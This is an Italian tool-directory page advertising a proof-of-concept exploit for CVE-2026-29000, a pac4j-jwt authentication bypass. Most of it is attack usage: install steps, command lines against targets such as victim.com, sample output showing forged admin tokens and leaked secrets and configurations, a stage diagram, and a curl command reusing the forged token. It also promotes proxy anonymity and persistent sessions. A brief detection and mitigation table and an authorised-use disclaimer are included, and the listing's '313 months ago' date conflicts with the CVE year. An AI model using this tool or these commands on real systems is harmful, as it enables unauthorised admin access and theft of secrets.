Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-29000-PoC-Exploit — CVE-2026-29000 – Bypass dell'autenticazione di pac4j-jwt (🔥 CVSS 10.0). Forgiatura dell'admin in un clic tramite wrapping JWE con chiave pubblica. Espone configurazioni, utenti, segreti. Keep-alive, proxy, JWKS personalizzati.⚙️ Strumento di Exploit PoC educativo. | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-29000-poc-exploit
Autenticazione e AutorizzazioneGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingApprendimento e FormazioneRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubtc4dy/cve-2026-29000-poc-exploit

CVE-2026-29000-PoC-Exploit

CVE-2026-29000 – Bypass dell'autenticazione di pac4j-jwt (🔥 CVSS 10.0). Forgiatura dell'admin in un clic tramite wrapping JWE con chiave pubblica. Espone configurazioni, utenti, segreti. Keep-alive, proxy, JWKS personalizzati.⚙️ Strumento di Exploit PoC educativo.

Vedi Repository
313 mesi faNon ancora revisionato

🚀 CVE-2026-29000 - Exploit di Bypass dell'Autenticazione pac4j-jwt

Python CVSS License Pentesting

CVE-2026-29000 - Creazione Admin con un Click tramite JWT alg:none + Crittografia JWE

📌 Panoramica

Questo exploit sfrutta CVE-2026-29000, una vulnerabilità critica con CVSS 10.0 nella libreria pac4j-jwt. Estratta la chiave pubblica JWKS del server e forgiato un token JWE crittografato con alg: none, ottiene un bypass completo dell'autenticazione e concede privilegi amministrativi totali in un clic.

🔥 Caratteristiche Principali

  • ✅ Nessuna Autenticazione Richiesta - Sfruttamento pre-autenticazione, nessuna credenziale valida necessaria
  • ✅ Scoperta Automatica JWKS - Scansiona oltre 15 endpoint, supporto percorsi personalizzati
  • ✅ Estrazione Chiave RSA - Recupera la chiave pubblica, converte JWK→PEM al volo
  • ✅ Forgiatura JWT + JWE - Crea JWT alg:none, lo avvolge con la chiave pubblica del server
  • ✅ Token Admin Completo - ROLE_ADMIN, admin:true, scadenza configurabile
  • ✅ Bypass Autenticazione - Testa automaticamente oltre 8 endpoint protetti
  • ✅ Fuga Info Intelligente - Enumera oltre 20 percorsi API sensibili
  • ✅ Persistenza Sessione - Thread keep-alive mantiene l'accesso
  • ✅ Supporto Proxy - Proxy HTTP/HTTPS per anonimato
  • ✅ Esportazione File - Salva token forgiato e dati trapelati su file
  • ✅ Meccanismo di Riprova - Tentativi configurabili per connessioni instabili
  • ✅ Output Colorato - Feedback visivo professionale per fasi
  • ✅ Modalità Verbosa - Log di debug per risoluzione problemi
  • ✅ Nessun Ritardo Predefinito - Solo backoff dei tentativi e ping keep-alive

🎯 Versioni Vulnerabili

LibreriaVersioni AffetteVersioni Corrette
pac4j-jwt< 5.1.5≥ 5.1.5
pac4j-jwt4.x < 4.5.8≥ 4.5.8
pac4j-jwt3.x < 3.18.6≥ 3.18.6

⚠️ Disclaimer: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e attività red-team.

📦 Installazione

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-29000-PoC-Exploit.git
cd CVE-2026-29000-PoC-Exploit
pip install -r requirements.txt
python exploit.py --help

requirements.txt: text

requests>=2.31.0 urllib3>=2.0.0 pyjwt>=2.8.0 cryptography>=41.0.0 jwcrypto>=1.5.0 colorama>=0.4.6

🚀 Utilizzo

Exploit Base One-Shot

root@kitploit:~
python exploit.py --target https://victim.com:8443

Salva Token Forgiato + Dati Trapelati

root@kitploit:~
python exploit.py -t https://target.corp:9443 -o admin.jwe -l stolen.txt

Modalità Verbosa con JWKS Personalizzato

root@kitploit:~
python exploit.py -t https://example.com:8080 --jwks /oauth/jwks.json -v

Con Proxy e Senza Keep-Alive

root@kitploit:~
python exploit.py -t https://192.168.1.100:443 --proxy http://127.0.0.1:8080 --no-keep-alive

Intervallo Keep-Alive Personalizzato

root@kitploit:~
python exploit.py -t https://victim.com:8443 --delay 10 --max-retries 5

Verifica SSL Abilitata

root@kitploit:~
python exploit.py -t https://legit.com:8443 --ssl-verify

⚙️ Argomenti da Riga di Comando

📸 Output di Esempio

root@kitploit:~
$ python exploit.py -t https://10.10.10.100:8443 -o backdoor.jwe -l leak.txt

╔══════════════════════════════════════════════════════════════════════════════╗
║     CVE-2026-29000 - pac4j-jwt Authentication Bypass Exploit                 ║
║                    The Educational One‑Click Admin Forge                     ║
║                            CVSS 10.0 - CRITICAL                              ║
╚══════════════════════════════════════════════════════════════════════════════╝

[11:23:15] STAGE 1: Acquiring RSA public key from JWKS
[11:23:15] Probing for JWKS endpoint...
[11:23:16] Found JWKS at /realms/master/protocol/openid-connect/certs
[11:23:16] Successfully extracted RSA public key

[11:23:16] STAGE 2: Crafting JWT with alg:none & encrypting into JWE
[11:23:16] Forged JWE token (truncated): eyJhbGciOiJSU0EtT0FFUC0yNTYiLCJlbmMiOiJBMjU2R0...
[11:23:16] ✓ Token saved to backdoor.jwe

[11:23:16] STAGE 3: Sending forged JWE as Bearer token
[11:23:17] ✓ Authentication successful! Access granted to /api/users/me

[11:23:17] STAGE 4: Enumerating accessible endpoints & revealing sensitive data
[11:23:18] ✓ Leaked: /actuator/env (status 200)
[11:23:18] ✓ Leaked: /api/users (status 200)
[11:23:18] ✓ Leaked: /api/secrets (status 200)
[11:23:18] ✓ Leaked: /config/server (status 200)
[11:23:18] ✓ Captured 4 sensitive endpoints → saved to leak.txt

[11:23:18] Keep‑alive session active (Ctrl+C to stop)
[11:23:18] Token (JWE) valid for ~1 hour – reforge if expired

🧠 Come Funziona

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│  STAGE 1: Public Key Acquisition                                │
│  ├── Discover JWKS endpoint (15+ known paths)                  │
│  ├── Fetch JWK containing RSA public key                       │
│  └── Convert JWK → PEM format                                   │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 2: Token Forging                                         │
│  ├── Create JWT with alg: "none"                               │
│  ├── Inject admin claims (ROLE_ADMIN, admin: true)             │
│  └── Encrypt JWT into JWE using server's public key            │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 3: Authentication Bypass                                 │
│  ├── Send JWE as Bearer token                                   │
│  ├── Test 8+ protected endpoints                               │
│  └── Extract session cookie                                     │
├─────────────────────────────────────────────────────────────────┤
│  STAGE 4: Information Exfiltration                              │
│  ├── Enumerate 20+ sensitive API paths                         │
│  ├── Collect configs, users, secrets, environment              │
│  └── Save all to leak file                                      │
├─────────────────────────────────────────────────────────────────┤
│  Keep-Alive: Ping /api/ping every N seconds                     │
└─────────────────────────────────────────────────────────────────┘

🔧 Utilizzo Manuale del Token

Dopo lo sfruttamento, usa il token JWE salvato con curl:

root@kitploit:~
curl -H "Authorization: Bearer $(cat backdoor.jwe)" https://target.com/api/admin/users

🛡️ Rilevamento e Mitigazione

Metodo di RilevamentoIndicatore
Analisi LogJWT con alg: none nei log di audit
Monitoraggio ReteRichieste endpoint JWKS da IP sconosciuti
Controllo Versionecurl /actuator/info | grep pac4j

Mitigazione:

  • Aggiorna pac4j-jwt alle versioni corrette (≥5.1.5, ≥4.5.8, ≥3.18.6)
  • Disabilita il supporto alg: none nel validatore JWT
  • Implementa una validazione JWE rigorosa
  • Monitora strutture JWT anomale
Scarica lo strumento
ArgomentoBreveObbligatorioPredefinitoDescrizione
--target-tSì-URL del target (es. https://example.com:8443)
--jwks-kNoauto-detectPercorso personalizzato endpoint JWKS
--output-oNoNoneSalva token JWE forgiato su file
--leak-lNoleaked_TIMESTAMP.txtSalva dati trapelati su file
--verbose-vNoFalseAbilita output di debug
--proxy-pNoNoneProxy HTTP/HTTPS
--user-agent-uaNoMozilla/5.0...User-Agent personalizzato
--no-keep-alive-NoFalseDisabilita keep-alive sessione
--delay-No5.0Intervallo ping keep-alive (secondi)
--max-retries-No3Massimi tentativi per richiesta fallita
--ssl-verify-NoFalseVerifica certificati SSL